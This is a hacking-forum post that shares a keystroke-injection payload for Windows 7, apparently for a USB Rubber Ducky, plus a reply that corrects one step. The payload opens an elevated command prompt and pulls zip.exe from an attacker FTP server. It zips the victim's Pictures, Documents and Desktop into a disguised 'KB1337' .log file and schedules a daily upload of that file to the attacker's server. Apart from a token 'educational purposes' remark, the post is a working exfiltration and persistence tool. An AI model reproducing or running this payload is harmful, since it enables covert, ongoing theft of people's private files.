Jump to content

[Payload] Schedule Daily Ftp Upload Of Pictures, Docs, And Desktop


Null Z3r0
 Share

Recommended Posts

Here is my first script for educational purposes ;-) It zips up the entire contents of a users Pictures Documents and Desktop and uploads it to your FTP server on a scheduled basis. Feel free to add some functionality or to change things a round a bit:

REM Author: /\/u!! Z3r0

REM Platform: Windows 7

REM Description: Schedules a backup of Pictures, My Documents, and Desktop

REM Zips Directory and Subdirectories into KB1337XXXXXXXX.log (X = date and time)

REM .log file is schedule to be uploaded every 24 hours (change the file extension back to .zip to open)

REM Download zip.exe and place on FTP server (allows recursive directory delivery) http://stahlworks.com/dev/zip.exe

ESCAPE

CONTROL ESCAPE

DELAY 50

STRING cmd

DELAY 200

MENU

DELAY 200

STRING a

ENTER

DELAY 800

LEFT

DELAY 200

ENTER

DELAY 600

ENTER

DELAY 50

STRING cd %systemroot%\system32

ENTER

REM Clean up for fresh exploit

STRING del himem.bak

ENTER

DELAY 100

STRING del datetime.bat

ENTER

DELAY 100

REM Create symbolic link to user's profile directory as c:\

STRING mklink /d \Docs %userprofile%

ENTER

DELAY 50

STRING mkdir \temp3

ENTER

DELAY 150

REM Create batch file to create zip file with date time file format

STRING copy con datetime.bat

ENTER

DELAY 150

STRING set _my_datetime=%date%_%time%

ENTER

DELAY 50

STRING set _my_datetime=%_my_datetime: =_%

ENTER

DELAY 50

STRING set _my_datetime=%_my_datetime::=%

ENTER

DELAY 50

STRING set _my_datetime=%_my_datetime:/=_%

ENTER

DELAY 50

STRING set _my_datetime=%_my_datetime:.=_%

ENTER

DELAY 50

REM Deletes old zip files before creating new up and placing it into c:\temp3

STRING del /F /S /Q /A \temp3\*.*

ENTER

DELAY 50

STRING zip -r c:\temp3\KB1337_%_my_datetime%.log c:\Docs\Pictures c:\Docs\Desktop c:\Docs\Documents

DELAY 50

STRING END

ENTER

DELAY 50

STRING exit

ENTER

DELAY 50

CTRL z

ENTER

DELAY 50

REM FTP script for automated upload

STRING copy con himem.bak

ENTER

DELAY 50

REM FTP Username

STRING FTPuser

ENTER

DELAY 50

REM FTP PASSWORD

STRING FTPpasswd

ENTER

DELAY 50

STRING bin

ENTER

DELAY 50

STRING prompt

ENTER

DELAY 50

STRING lcd \temp3

ENTER

DELAY 50

STRING mkdir pwned

ENTER

STRING cd pwned

ENTER

STRING mput *

ENTER

DELAY 50

STRING quit

ENTER

DELAY 50

CTRL z

ENTER

DELAY 50

REM IP of Evil FTP server with zip.exe

STRING ftp 192.168.1.18

ENTER

DELAY 50

STRING cisco

ENTER

DELAY 50

STRING cisco

ENTER

DELAY 50

STRING bin

ENTER

DELAY 50

STRING prompt

ENTER

DELAY 50

REM Get ZIP.exe and put it into system32

STRING get zip.exe

ENTER

DELAY 100

STRING quit

ENTER

DELAY 50

ENTER

REM Start Task Scheduler

STRING net start

ENTER

DELAY 50

STRING net start "task scheduler"

ENTER

DELAY 50

REM Schedule upload to IP of Evil FTP server to dump captured data

STRING at 23:50 /every:M,T,W,Th,F,S,Su %systemroot%\system32\ftp.exe -s:%systemroot%\system32\himem.bak 192.168.1.18

ENTER

DELAY 50

STRING at 23:48 /every:M,T,W,Th,F,S,Su cmd /c %systemroot%\system32\datetime.bat

ENTER

DELAY 50

STRING exit

ENTER

Link to comment
Share on other sites

Minor edit. Add ENTER under second delay:

From:

DELAY 50

STRING zip -r c:\temp3\KB1337_%_my_datetime%.log c:\Docs\Pictures c:\Docs\Desktop c:\Docs\Documents

DELAY 50

STRING END

ENTER

to:

DELAY 50

STRING zip -r c:\temp3\KB1337_%_my_datetime%.log c:\Docs\Pictures c:\Docs\Desktop c:\Docs\Documents

DELAY 50

ENTER

STRING END

ENTER

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...